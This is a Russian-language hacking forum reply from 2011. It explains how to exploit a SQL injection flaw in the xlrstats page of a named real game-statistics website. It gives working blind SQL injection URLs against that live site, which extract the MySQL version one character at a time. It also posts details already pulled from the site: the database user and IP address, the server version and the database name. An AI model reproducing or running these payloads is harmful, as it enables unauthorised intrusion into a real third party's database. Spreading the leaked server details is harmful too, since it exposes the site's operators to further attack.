27.10.2011, 20:42
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от root47
http://cod.gamepolis.ru/xlrstats/index.php?func=player&playerid=1 можно ли раскрутить sql in?Если да то как?
Конечно, можно !!!
Но вывода я не нашёл. Так что крутил как Blind SQL.
Там 5 ветка, так что тебе повезло.
Код:
http://cod.gamepolis.ru/xlrstats/index.php?func=player&playerid=1+and+substring((version()),1,1)=5
Выдирай посимвольно через ASCII например вот так:
Код:
http://cod.gamepolis.ru/xlrstats/index.php?func=player&playerid=1+and+ascii(substring((version()),1,1))=53
http://cod.gamepolis.ru/xlrstats/index.php?func=player&playerid=1+and+ascii(substring((version()),2,1))=46
Часть данных:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]Current User[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]cod4[/COLOR][COLOR="#007700"]@[/COLOR][COLOR="#0000BB"]95.154.113.66
Sql Version[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]5.1.58
Current DB[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]cod4[/COLOR][/COLOR]
|
|
|